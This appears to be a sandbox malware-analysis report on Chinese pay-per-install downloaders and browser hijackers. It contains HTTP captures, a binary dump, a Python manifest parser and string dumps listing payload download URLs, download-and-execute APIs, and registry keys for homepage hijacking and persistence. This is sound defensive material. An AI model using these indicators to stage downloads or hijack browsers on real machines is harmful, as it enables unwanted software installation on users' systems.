04:55:27 GMT..Accept-Ranges: bytes..ETag: "f8f01b66e768cf1:17e5"..Serv
er: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Wed, 07 May 2014 1
0:26:21 GMT..[dl]..hXXp://211.101.12.49/dls/axuls.exe=..hXXp://211.101
.12.49/dls/axult.exe=..hXXp://117.21.183.24/ifox/TGQgoEo3TGwCodVok5XuJ
EsdJwuYq5QdqwXYol-WaExNs91v/IFoxInstall-y-c203945859-run-s-x.exe=..htt
p://download.wuji.com/wuji/open/setup_open_341.exe=..hXXp://click.t3nl
ink.com/link/140896/setup_2948-140896.exe=..hXXp://download.grandc

<<< skipped >>>
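The 961-byte pwb.htm body above is not a web page but the downloader's task list: an INI-style file whose [dl] section holds fifteen installer URLs (two on non-standard ports, 888 and 8765), and whose [pw], [hp] and [hp2] sections carry the pop-up and homepage addresses (hao.6360.info, hao.uenet.info) that the OpenHomePage\Command and search-URL strings further down tie to the browser hijack. Each entry is written as "URL=" so that an INI reader sees a key with an empty value. The parser below is an added example, not code from the report; the sample body is transcribed from the capture as constructed input, keeping the report's hXXp:// and VVV. defanging so the refang step is exercised.

```python
"""Parse the pay-per-install manifest served from /ad/softad/pwb.htm.

Added example (not code from the original report). SAMPLE_MANIFEST is a
constructed transcription of the captured body with normalised line endings.
"""
import re
from collections import Counter
from urllib.parse import urlsplit

SAMPLE_MANIFEST = """[dl]
hXXp://211.101.12.49/dls/axuls.exe=
hXXp://211.101.12.49/dls/axult.exe=
hXXp://117.21.183.24/ifox/TGQgoEo3TGwCodVok5XuJEsdJwuYq5QdqwXYol-WaExNs91v/IFoxInstall-y-c203945859-run-s-x.exe=
hXXp://download.wuji.com/wuji/open/setup_open_341.exe=
hXXp://click.t3nlink.com/link/140896/setup_2948-140896.exe=
hXXp://download.grandcloud.cn/9291/19156/yszj_zhimeng_160110.exe=
hXXp://down.yuemar.net:888/yuemar_x06.exe=
hXXp://xz.657080.com/download.php/LD_2075_S.exe=
hXXp://VVV.huamei-global.com/play_3020_161196.exe=
hXXp://down.xiaoxinrili.com/hezi/jm/s1014.exe=
hXXp://222.76.213.168:8765/sOnlinetime1.4.1_1114.exe=
hXXp://xz.fuzhicheng.com/n/pczh_110_157239.exe=
hXXp://downloads.t3nlink.com/packages/g_wz/default2/wuzun-zm-157391-v6.exe=
hXXp://lm.beilequ.com/update/365/365weatherIns_202.exe=
hXXp://download.grandcloud.cn/9291/20572/-8388_158017_xc.exe=
[pw]
hXXp://hao.6360.info/=
[hp]
hXXp://hao.6360.info/=
[hp2]
hao.uenet.info=
"""

SECTION_RE = re.compile(r"^\[([^\]]+)\]$")


def refang(value):
    """Undo the report's defanging so the URL parser sees a real scheme/host."""
    return (value.replace("hXXps://", "https://")
                 .replace("hXXp://", "http://")
                 .replace("VVV.", "www."))


def parse_manifest(text):
    """Return {section: [values]} for the INI-like manifest.

    Every value line is 'URL=' (a key with an empty value); the trailing '='
    is stripped and the URL refanged. A value before any [section] is an error.
    """
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
            sections.setdefault(current, [])
            continue
        if current is None:
            raise ValueError("value before any [section]: %r" % line)
        sections[current].append(refang(line.rstrip("=")))
    return sections


def host_port(url):
    """(hostname, port) for a URL; bare hostnames (as in [hp2]) are accepted."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    return parts.hostname, parts.port or 80


def summarize(text):
    """Turn the manifest into the facts an analyst wants: hosts, ports, names."""
    sections = parse_manifest(text)
    downloads = sections.get("dl", [])
    hosts = Counter(host_port(u) for u in downloads)
    return {
        "download_count": len(downloads),
        "download_hosts": hosts,
        "nonstandard_ports": sorted(hp for hp in hosts if hp[1] != 80),
        "popup": sections.get("pw", []),
        "homepage": sections.get("hp", []) + sections.get("hp2", []),
        "exe_names": [u.rsplit("/", 1)[-1] for u in downloads],
    }


if __name__ == "__main__":
    s = summarize(SAMPLE_MANIFEST)
    print("%d payloads from %d hosts" % (s["download_count"], len(s["download_hosts"])))
    for (host, port), n in sorted(s["download_hosts"].items()):
        print("  %s:%d  x%d" % (host, port, n))
    print("homepage set to:", s["homepage"])
```

Running it prints the per-host payload tally and the homepage setting; the host tally is what goes into a blocklist, and exe_names can be matched against the hzsoft\<name>.exe strings in the axuls.exe and axult.exe dumps below to see which manifest entries this sample actually acted on.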

GET /qdn/setup_qd304.gif HTTP/1.1
User-Agent: Metadl/1.0 (NSIS plugin)
Host: down.guangsu.cn
Accept: */*


HTTP/1.1 200 OK
Date: Wed, 07 May 2014 10:27:39 GMT
Content-Type: image/gif
Last-Modified: Wed, 19 Feb 2014 12:34:34 GMT
Accept-Ranges: bytes
ETag: "0a998f16e2dcf1:0"
Server: Microsoft-IIS/7.5
Content-Length: 13843752
X-Via: 1.1 zjjhdx39:8080 (Cdn Cache Server V2.0), 1.1 fra72:6 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......<.yex..6x
..6x..6_Pz6{..6_Pl6i..6x..6...6q..6s..6q..6y..6q..6y..6Richx..6.......
.........PE..L..../.Q.................\..........p3.......p....@......
....................0..............................................pv.
..........E..........h'...............................................
................p...............................text....[.......\.....
............. ..`.rdata..\....p.......`..............@..@.data........
........v..............@....ndata.......@...........................rs
rc....E.......F...x..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....;B..H.P.u..u..u...Hr@..K...SV.5.;B.W.E.P.u...Lr@..e...E..E.P.u...
Pr@..}..e....Dp@........FR..VV..U... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...Hp@..E..P.E..E.
P.u...Tr@..u....E..9}...n....~X.te.v4..Lp@..E...tU.}.j.W.E......E.....
..Pp@..vXW..Tp@..u..5Xp@.W..h ....E..E.Pj.h.3B.W..Xr@..u.W...u....E.P.
u...\r@._^3.[.....L$...;B...i......T.....tUVW.q.3.;5.;B.sD..i......D..
S.....t.G.....t...O..t .....u...3....3...F.....;5.;B.r.[_^...U..QQ

<<< skipped >>>

GET /js/s.js HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/ad/softad/popup.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cbjs.baidu.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Wed, 07 May 2014 10:27:31 GMT
Content-Type: application/x-javascript
Last-Modified: Wed, 16 Apr 2014 09:59:09 GMT
Transfer-Encoding: chunked
Connection: close
Server: Apache
Expires: Wed, 07 May 2014 10:32:31 GMT
Cache-Control: max-age=300
Content-Encoding: gzip
3437..............yW......S..\j...M{zl./..6m...i..,M......B....{. m...
{..].A...~.a{.....bv5.......w..0.....i.n.N&...e.x.-..E.....t...iR...._
_D..YxQ.ic7......pz>..e...........g..|....6%.j%.\.}o.E.d....Y.~....
{x.........0.f.(...i..C>..r...I.g.X..(.2O.Iq.3..i..w..a....4.....`.
..A..{..p?..Q~....Q.}=.q$..I..D..4...'A....n9...<.#.4...0....<|.
.}..0.7.....".E.tk ..j.N~.._...i...|.....Q.q.h.2]].......ux.O....n...|
.-.U.(....~..........t...k....Q{.M.....Z~.OO..".|... a..h6.\5..A...z..
..7d.5....2.4w.0L...w.."k....$..?;H....@..W.......z.......Z.0...t.zb..
..v=1..3...~|..mm=k.|..O[[Y{v..Q..Yf.a.1:..Y..*W.d(.......A5..'. }lo..
....:cj?G..zY{Z...I.Y.........O}?..x.?.OTU....T.9.j"Ozt..c...=.....>
;...}Lq..l.]V..C .5.... ..Y}..X..g.....~o....?..O.4....;.0....e.....yk
....z.c..4..i`>..X...1[...Q........&..4.E2.g...Q;.E.EV..y9....$Z\M.
.c&.$.....aV....Wo...v....(.|p{.|....*....rW>...L .=.....(....y....
e...@O.qc....}.R3o}.=8x..k>..=..9...i6..w ..(N.......H... i...,.Wa.
.!1I.a.......;l....f....."'r.N.q.^.t.!.W...q{1..%..G......Y....7....a.
.A..-...._.@....3[.c....j.....K....2..ej_h..w."l..j.B..I........4.Z...
............,z..;.wv.e.(...:............XV..-].HTTP/1.1 200 OK..Date:
Wed, 07 May 2014 10:27:31 GMT..Content-Type: application/x-javascript.
.Last-Modified: Wed, 16 Apr 2014 09:59:09 GMT..Transfer-Encoding: chun
ked..Connection: close..Server: Apache..Expires: Wed, 07 May 2014 10:3
2:31 GMT..Cache-Control: max-age=300..Content-Encoding: gzip..3437....
..........yW......S..\j...M{zl./..6m...i..,M......B....{. m...{..]

<<< skipped >>>

GET /9.gif?abc=1&rnd=557467190 HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwb
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cnzz.mmstat.com
Connection: Keep-Alive


HTTP/1.1 302 Found
Server: Tengine
Date: Wed, 07 May 2014 10:27:26 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=jvjwC0DkbHMCAcGK9Oc9dLvc; expires=Sat, 04-May-24 10:27:26 GMT; path=/; domain=.mmstat.com
Set-Cookie: sca=92efa130; path=/; domain=.cnzz.mmstat.com
Set-Cookie: atpsida=0c9782443e5b20a14f38b12f_1399458446; expires=Sat, 04-May-24 10:27:26 GMT; path=/; domain=.cnzz.mmstat.com
Location: hXXp://pcookie.cnzz.com/app.gif?&cna=jvjwC0DkbHMCAcGK9Oc9dLvc
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GIF89a.............!.......,...........L..;HTTP/1.1 302 Found..Server:
Tengine..Date: Wed, 07 May 2014 10:27:26 GMT..Content-Type: image/gif
..Content-Length: 43..Connection: keep-alive..P3P: CP="NOI DSP COR CUR
a ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"..Set-Cookie: cna=jvjwC0DkbH
MCAcGK9Oc9dLvc; expires=Sat, 04-May-24 10:27:26 GMT; path=/; domain=.m
mstat.com..Set-Cookie: sca=92efa130; path=/; domain=.cnzz.mmstat.com..
Set-Cookie: atpsida=0c9782443e5b20a14f38b12f_1399458446; expires=Sat,
04-May-24 10:27:26 GMT; path=/; domain=.cnzz.mmstat.com..Location: htt
p://pcookie.cnzz.com/app.gif?&cna=jvjwC0DkbHMCAcGK9Oc9dLvc..Expires: T
hu, 01 Jan 1970 00:00:01 GMT..Cache-Control: no-cache..Pragma: no-cach
e..GIF89a.............!.......,...........L..;..


GET /stat.php?id=4327411&web_id=4327411&show=pic HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwb
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s85.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Date: Wed, 07 May 2014 10:27:24 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Wed, 07 May 2014 10:27:24 GMT
Expires: Wed, 07 May 2014 11:57:24 GMT
ef2..(function(){function l(){this.c="4327411";this.R="z";this.N="pic"
;this.K="";this.M="";this.o="1399458444";this.P="hzs2.cnzz.com";this.L
="";this.s="CNZZDATA" this.c;this.r="_CNZZDbridge_" this.c;this.G="_cn
zz_CV" this.c;this.u="0";this.B={};this.a={};this.la()}function g(a,b)
{try{var c=[];c.push("siteid=4327411");.c.push("name=" d(a.name));c.pu
sh("msg=" d(a.message));c.push("r=" d(h.referrer));c.push("page=" d(f.
location.href));c.push("agent=" d(f.navigator.userAgent));c.push("ex="
d(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image)
.src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(e){}}var h=doc
ument,f=window,d=encodeURIComponent,k=decodeURIComponent,p=unescape,r=
escape,m="https:"===f.location.protocol?"https:":"http:",s=m "//c.cnzz
.com/core.php";l.prototype={la:function(){try{this.U(),.this.J(),this.
ia(),this.H(),this.m(),this.ga(),this.fa(),this.ja(),this.j(),this.ea(
),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa(),f[this.r
]=f[this.r]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},oa:func
tion(){try{var a=this;f._czc={push:function(){return a.C.apply(a,argum
ents)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=f._czc;if(
"[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b ){
var c=a[b];switch(c[0]){case "_setAccount":f._cz_account="[object Stri
ng]"===.{}.toString.call(c[1])?c[1]:String(c[1]);break;case "_setAutoP
ageview":"boolean"===typeof c[1]&&(f._cz_autoPageview=c[1])}}}catch(e)
{g(e,"cS failed")}},qa:function(){try{if("undefined"===typeof f._c

<<< skipped >>>

The Trojan-Banker connects to the servers at the following location(s) (hosts taken from the HTTP exchanges above):

117.21.183.24
112.253.11.143
112.253.11.137
download.grandcloud.cn
adsvc2.9365.info
click.t3nlink.com
c.cnzz.com
s85.cnzz.com
cnzz.mmstat.com
cbjs.baidu.com
down.guangsu.cn

vsgrtaho.exe_1684:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
htKeyword
EInvalidOperation
u%CNu
%s_%d
.Owner
EInvalidGraphicOperation
UhÛ
USER32.DLL
comctl32.dll
PasswordCharLDD
OnKeyDown
OnKeyPressH
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
IMM32.DLL
AutoHotkeysl:D
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview`AD
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
ole32.dll
olepro32.dll
IWebBrowser
IWebBrowserApp\
IWebBrowser2
TWebBrowserStatusTextChange
TWebBrowserProgressChange
TWebBrowserCommandStateChange
TWebBrowserTitleChange
TWebBrowserPropertyChange
TWebBrowserBeforeNavigate2
TWebBrowserNewWindow2
TWebBrowserNavigateComplete2
TWebBrowserDocumentComplete
TWebBrowserOnVisible
TWebBrowserOnToolBar
TWebBrowserOnMenuBar
TWebBrowserOnStatusBar
TWebBrowserOnFullScreen
TWebBrowserOnTheaterMode
TWebBrowser
webpopup
webcount
http://www.baidu.com/baidu?tn=flstudios_cb&word={searchTerms}&cl=3&ie=utf-8
Program Files\Internet Explorer\iexplore.exe
\CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}
\CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}\DefaultIcon
\CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}\Shell\Open(&O)
\CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}\Shell\Open(&O)\Command
CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}\Shell\
rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,0
CLSID\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}\ShellFolder
\ieframe.dll,-190
\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{B5E5F4B8-AE47-4017-9D14-A91862AFFE9D}
Program Files\Internet Explorer\iexplore.exe"
SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
*.lnk
Opera.lnk
WiseBrowser.lnk
TT.lnk
Mozilla Firefox.lnk
3.lnk
Maxthon.lnk
pwb.dll
http://adsvc2.9365.info/ad/softad/pwb.htm
http://www.9365.info
www.9365.info
xxvfrg.bat
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegFlushKey
RegCreateKeyExA
WinExec
GetWindowsDirectoryA
GetCPInfo
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
shell32.dll
ShellExecuteA
URLMON.DLL
URLDownloadToFileA
>#>'> >/>
2"3&3*3.32363:3>3
;%; ;7;?;{;
>(>3>;>[>{>
< <$<(<,<0<
8'8/8@8[8
1 1$1(1,10141
465;5_5{5
KWindows
UrlMon
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
http://adsvc2.9365.info/ad/softad/popup.htm
http://adsvc2.9365.info/count/softcount/?pwb
8Listbox (%s) style must be virtual in order to set Count"Unable to find a Table Of Contents
No help found for %s#No context-sensitive help installed$No topic-based help system installed
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s
Unable to insert a line Clipboard does not support Icons/Menu '%s' is already being used by another form
Error setting %s.Count
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Metafile is not valid!Cannot change the size of an icon Invalid operation on TOleGraphic
Unsupported clipboard format
Cannot create file %s
Cannot open file %s
Unable to write to %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Invalid variant operation"Variant method calls not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d

axuls.exe_884:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
u%CNu
Uh.AA
.Owner
ieoduui.bat
http://www.baidu.com/baidu?tn=flstudios_cb&word={searchTerms}&cl=3&ie=utf-8
Program Files\Internet Explorer\iexplore.exe"
SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
GGSafe_tjywmax(52).exe
http://download.grandcloud.cn/9291/15765/GGSafe.exe
hzsoft\GGSafe_tjywmax(52).exe
IFoxInstall-y-c203945859-run-s-x.exe
http://117.21.183.24/ifox/TGQgoEo3TGwCodVok5XuJEsdJwuYq5QdqwXYol-WaExNs91v/IFoxInstall-y-c203945859-run-s-x.exe
http://download.grandcloud.cn/9291/15956/IFoxInstall-y-c203945859-run-s-x.exe
hzsoft\IFoxInstall-y-c203945859-run-s-x.exe
setup_open_341.exe
http://download.wuji.com/wuji/open/setup_open_341.exe
hzsoft\setup_open_341.exe
s1014.exe
http://down.xiaoxinrili.com/hezi/jm/s1014.exe
hzsoft\s1014.exe
setupX_2001_131.exe
http://www.yldsjs.com/setupX_2001_131.exe
hzsoft\setupX_2001_131.exe
LD_2075_S.exe
http://xz.657080.com/download.php/LD_2075_S.exe
hzsoft\LD_2075_S.exe
http://download.wallba.com/download.php/kuping_s_50996.exe
hzsoft\kuping_s_50996.exe
sOnlinetime1.4.1_1114.exe
http://222.76.213.168:8765/sOnlinetime1.4.1_1114.exe
http://download.grandcloud.cn/9291/17153/sOnlinetime1.4.1_1114.exe
hzsoft\sOnlinetime1.4.1_1114.exe
setup_2948-140896.exe
http://click.t3nlink.com/link/140896/setup_2948-140896.exe
hzsoft\setup_2948-140896.exe
pczh_110_157239.exe
http://xz.fuzhicheng.com/n/pczh_110_157239.exe
hzsoft\pczh_110_157239.exe
play_3020_161196.exe
http://www.huamei-global.com/play_3020_161196.exe
hzsoft\play_3020_161196.exe
unersqa.exe
unotcvb.exe
setup_open_188.exe
setupX_054.exe
setup_2949-14598.exe
Program Files\2345Explorer\Uninstall.exe
http://www.9365.info
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegFlushKey
RegCreateKeyExA
WinExec
GetWindowsDirectoryA
GetCPInfo
URLMON.DLL
URLDownloadToFileA
6 6$6(6,6064686<6
7"7&7*7.72767
?'? ?/?3?7?;?
0"0&0*0.02060
KWindows
UrlMon
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
%s.Seek not implemented$Operation not allowed on sorted list
Property %s does not exist
Ancestor for '%s' not found
Cannot assign a %s to a %s
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file %s
Cannot open file %s$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

axult.exe_1744:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
u%CNu
Uh.UA
.Owner
ksydths.bat
http://www.baidu.com/baidu?tn=flstudios_cb&word={searchTerms}&cl=3&ie=utf-8
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SHELL FOLDERS
Program Files\Internet Explorer\iexplore.exe"
SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
setup_2949-14598.exe
http://download.grandcloud.cn/9291/15474/setup_2949-14598.exe
hzsoft\setup_2949-14598.exe
yuyuset_26_151422.exe
http://down.junshn.com/new/yuyuset_26_151422.exe
hzsoft\yuyuset_26_151422.exe
setup_qd304.exe
http://down.guangsu.cn/qdn/setup_qd304.exe
hzsoft\setup_qd304.exe
UUSEE_kb1003_Setup_133149.exe
http://download.uusee.com/pop1/kb1003/UUSEE_kb1003_Setup_133149.exe
hzsoft\UUSEE_kb1003_Setup_133149.exe
WanDouJiaSetup_zhimeng7_kb.exe
http://dl.wandoujia.com/files/third/WanDouJiaSetup_zhimeng7_kb.exe
hzsoft\WanDouJiaSetup_zhimeng7_kb.exe
wuzun-zm-157391-v6.exe
http://downloads.t3nlink.com/packages/g_wz/default2/wuzun-zm-157391-v6.exe
hzsoft\wuzun-zm-157391-v6.exe
wauee_jx036.exe
http://download.grandcloud.cn/9291/19525/wauee_jx036.exe
hzsoft\wauee_jx036.exe
yszj_zhimeng_160110.exe
http://download.grandcloud.cn/9291/19156/yszj_zhimeng_160110.exe
hzsoft\yszj_zhimeng_160110.exe
365weatherIns_202.exe
http://lm.beilequ.com/update/365/365weatherIns_202.exe
hzsoft\365weatherIns_202.exe
yuemar_x06.exe
http://down.yuemar.net:888/yuemar_x06.exe
hzsoft\yuemar_x06.exe
-8388_158017_xc.exe
http://download.grandcloud.cn/9291/20572/-8388_158017_xc.exe
hzsoft\-8388_158017_xc.exe
unersqa.exe
unotcvb.exe
IFoxInstall-y-c203945859-run-s-x.exe
setup_open_188.exe
setupX_054.exe
http://www.9365.info
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegFlushKey
RegCreateKeyExA
WinExec
GetWindowsDirectoryA
GetCPInfo
URLMON.DLL
URLDownloadToFileA
?!?%?)?-?1?^?
KWindows
UrlMon
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
%s.Seek not implemented$Operation not allowed on sorted list
Property %s does not exist
Ancestor for '%s' not found
Cannot assign a %s to a %s
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file %s
Cannot open file %s$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

wjplay.exe_1456:

.text
`.rdata
@.data
.rsrc
@.reloc
xSSSh
FTPjKS
FtPj;S
C.PjRV
Visual C++ CRT: Not enough memory to complete call to strerror.
portuguese-brazilian
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
GetProcessWindowStation
http://update.wuji.com/
\SysConfig.ini
Software\Microsoft\Windows\CurrentVersion\Run
"%s" -mini
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WJNews.exe
"%s%s" -mini
http://wj.wuji.com/
<4,$?7/'
(3-!0,1'8"5.*2$
morewin.xml
AdWebBrowser
adwin.xml
FBWebBrowser
feedback.xml
web_feedback
locallist.xml
list_item.xml
operation
{i menu_6.png}
popmenu.xml
btn_%s
file='menuitem.png' source='0,0,120,30'
{i i_youku.png}
{i i_tudou.png}
{i i_sohu.png}
{i i_qiyi.png}
{i i_pptv.png} PPTV
{i i_leshi.png}
{i i_pps.png} PPS
{i i_qq.png}
{i i_wasu.png}
file='menuitem.png' source='0,30,120,60'
PopSrc.xml
poptip.xml
http://www.hao123.com/?tn=97514469_hao_pg
xml/bottom.xml
%ProgramFiles%\Internet Explorer\iexplore.exe
%s\%s
CheckUpdate.xml
PlayerUpdate.exe
http://tj.wuji.com/
feedback/b.html
playlist.xml
EkanWebBrowser
homewin.xml
Data/user2.ini
%s?%s
a.ashx
00:00:00:00:00:00
%d-%d-%d %d:%d:%d
X:X:X:X:X:X
//./%s
client.ini
2000-01-01
Software\Microsoft\Windows NT\CurrentVersion
http://download.wuji.com/
pu.exe
%d-%d-%d
%d-d-d
SysConfig.ini
%s\360se\360se.ini
%s\SogouExplorer\config.xml
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\TheWorld.exe
\TheWorld.ini
AppUpdate/PlayerUpdate.zip
AppUpdate/WJNews.zip
apnews.exe
AppUpdate/apnews.zip
server.ini
appupdate/ver.ini
WujiPlayer.%s
Data\wj.ico,0
%s\DefaultIcon
%s\Shell
%s\Shell\Open
%s\Shell\Open\Command
"%s" "%%1"
Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\%s\UserChoice
Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\%s
http://update.wuji.com/tj.ashx
http://www.hao123.com/?tn=39005018_672_hao_pg
http://update.wuji.com/goUrl.html?
data\tab_more.png
tab/tab_more.png
tab/url.txt
PlayWebBrowser
mainwin.xml
http://www.wuji.com
tab_web
file='%sData\tab_more.png' source='0,0,100,40'
file='%sData\tab_more.png' source='0,40,100,80'
file='%sData\tab_more.png' source='0,80,100,120'
xoxo/liebiao.html
Data/Def.html
txt_url
file='bgtab1.png' corner='746,96,1,1'
file='bgtab2.png' corner='746,96,1,1'
tab_weblist
%splay.html?vodinfo=%s_%s_1
play.html?vodinfo=
%s_%s_%s
%s_%s_%d
%splay.html?vodinfo=%s
\ch.ini
sysConfig.xml
tab_hotkey
AppUpdate/getver.html
AppUpdate/IsUpdate.html
AppUpdate/Done.html
AppUpdate/Error.html
split.xml
WebToolBar
ToolBar.xml
close.xml
E:\CPP\[2012-9]
\WujiSimple\bin\wjplay.pdb
WinExec
KERNEL32.dll
RegisterHotKey
UnregisterHotKey
USER32.dll
RegOpenKeyExA
RegOpenKeyA
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
?NavigateUrl@CWebBrowserUI@DuiLib@@QAEXPBD@Z
